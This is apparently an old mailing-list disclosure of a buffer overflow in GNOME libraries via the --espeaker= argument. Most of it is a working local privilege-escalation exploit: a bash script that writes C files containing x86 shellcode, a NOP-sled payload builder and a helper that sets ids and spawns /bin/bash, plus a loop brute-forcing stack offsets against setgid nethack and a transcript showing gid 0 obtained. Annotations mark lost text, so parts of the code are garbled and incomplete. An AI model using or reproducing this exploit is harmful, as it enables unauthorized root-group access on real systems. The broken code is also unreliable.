Greetings,

Virtually any program using the GNOME libraries is vulnerable to a buffer overflow attack. The attack comes in the form:

/path/to/gnome/prog --enable-sound --espeaker=$80bytebuffer

The following exploit should work against any GNOME program, though I tried it on (the irony) /usr/games/nethack, which is SGID root by default on RH6.0.

An attack on any program will look something like this:

[xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id
Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686 unknown
Linux Mandrake release 6.0 (Venus)
uid=501(xnec) gid=501(xnec) groups=501(xnec)
[xnec@redhack gnox]$ ./gnox.sh
Building /tmp/gnox.c...
...done!
Building /tmp/gn.c...
...done!
Compiling /tmp/gnox...
...done!
Compiling /tmp/gn...
...done!
Launching attack...
... pages and pages of segfaults
Generic GNOME exploit for Linux x86
Brock Tellier btellier@webley.com

Using addr: 0xbffff988 buflen:90 offset:208
Can't resolve host name "ë^1AFF ° óV I1UØ@IèÜÿÿÿ/tmp/gnùÿ¿ùÿ¿Xúÿ¿Z"!
before: uid=501, euid=501, gid=501, egid=0
after: uid=501, euid=501, gid=0, egid=0
[xnec@redhack gnomehack]$ id
uid=501(xnec) gid=0(root) groups=501(xnec)

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

--- gnox.sh ---
#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so. Hence the shell script.
#
# This should work against any su/gid GNOME program. The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier btellier@webley.com
echo "Building /tmp/gnox.c..."
# NOTE(review): this script was recovered from an HTML-stripped mailing-list
# post. Text between '<' and '>' characters was dropped by the extraction, so
# the heredoc delimiter after 'cat > /tmp/gnox.c', the header names on the
# #include line(s), and the tail of the for-loop in gnox.c are missing. The
# tokens below are kept exactly as recovered; nothing lost is reconstructed.
#
# Weakness exercised, as described in the post: a GNOME library copies the
# --espeaker= command-line value into a fixed 80-byte stack buffer without a
# bounds check, so every setuid/setgid program linked against it inherits the
# flaw. Mitigation is a bounds-checked (or heap-allocated) copy in the library
# and not installing GNOME-linked programs setuid/setgid at all.
cat > /tmp/gnox.c <
#include
/* Payload bytes; the trailing "/tmp/gn" is the path of the helper built
 * further down by this same script. */
char gnoshell[]= /* Generic Linux x86 shellcode modified to run our program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";
#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

/* Returns the caller's stack pointer. There is no return statement: the
 * inline asm leaves the value in %eax and the function relies on the i386
 * convention of returning integers in %eax. Falling off the end of a
 * non-void function and using the result is undefined behaviour in C, and
 * the asm does not declare its %eax clobber, so the result is
 * compiler-dependent. Only meaningful on 32-bit x86. */
unsigned long get_sp(void) { __asm__("movl %esp, %eax"); }

/* Builds the over-long argument handed to the target program.
 * argv[1] (optional): offset subtracted from the current stack pointer;
 * DEFAULT_OFFSET when absent. More than one argument prints usage and
 * exits -- with status 0, which hides the error from the calling shell.
 * Defects visible here: 'void main' is non-standard; atoi() silently
 * accepts garbage; addr-offset is a long printed with %x; gnobuf is
 * declared but unused in the recovered text (presumably filled after the
 * cut). The function is cut off inside the for-loop below, so the rest of
 * main -- including whatever is written to stdout for the shell script to
 * capture -- is not visible. */
void main(int argc, char *argv[]) {
    int offset, i;
    int buflen = BUFLEN;
    long int addr;
    char buf[BUFLEN];
    char gnobuf[LEN];
    if(argc > 2) {
        /* The usage string presumably named the offset argument inside
         * angle brackets, which the extraction dropped. */
        fprintf(stderr, "Error: Usage: %s \n", argv[0]);
        exit(0);
    } else if (argc == 2){
        offset=atoi(argv[1]);
    } else {
        offset=DEFAULT_OFFSET;
    }
    addr=get_sp();
    fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
    fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
    fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset, buflen, offset);
    /* buf is filled with NOP bytes and gnoshell is copied in at byte 35;
     * 35 + strlen(gnoshell) stays below BUFLEN for the 45-byte payload
     * above, but nothing checks that if gnoshell is changed. */
    memset(buf,NOP,buflen);
    memcpy(buf+35,gnoshell,strlen(gnoshell));
    for(i=35+strlen(gnoshell);i
# NOTE(review): the recovered text resumes here. The loop body, the end of
# main, the EOF terminator of the first heredoc, the echo lines for
# "/tmp/gn.c" seen in the post's transcript, and the 'cat >' of the second
# heredoc were lost; only '/tmp/gn.c <' survives.
/tmp/gn.c <
/* Helper run by the injected payload. It prints the process's ids, sets
 * the real uid/gid equal to the current effective uid/gid (the ones the
 * setgid bit on the target granted -- the transcript shows egid 0 becoming
 * gid 0), prints them again and starts a shell. 'void main' is
 * non-standard and the setreuid()/setregid() return values are not
 * checked. Defensive note: the only reason this works is that the target
 * still holds its elevated ids when the overflow is reached; a setgid
 * program that drops privileges before parsing arguments, or a
 * distribution that does not ship GNOME-linked binaries setgid, removes
 * the end state this helper depends on. */
void main() {
    printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid());
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid());
    system("/bin/bash");
}
EOF
echo "...done!"
echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"
echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"
echo "Launching attack..."
# Tries stack offsets from 0 to 10000 in steps of 4, re-running the setgid
# target with the argument gnox prints on stdout. Every wrong guess crashes
# the target (the "pages of segfaults" in the transcript), so a burst of
# SIGSEGVs from one setgid binary in a short time is a clear host-based
# detection signal for this class of attack; core dumps of setgid programs
# being suppressed by the kernel does not hide the crash records themselves.
offset=0
while [ $offset -lt 10000 ]; do
    /usr/games/nethack `/tmp/gnox $offset`
    offset=`expr $offset + 4`
done
echo "...done!"
------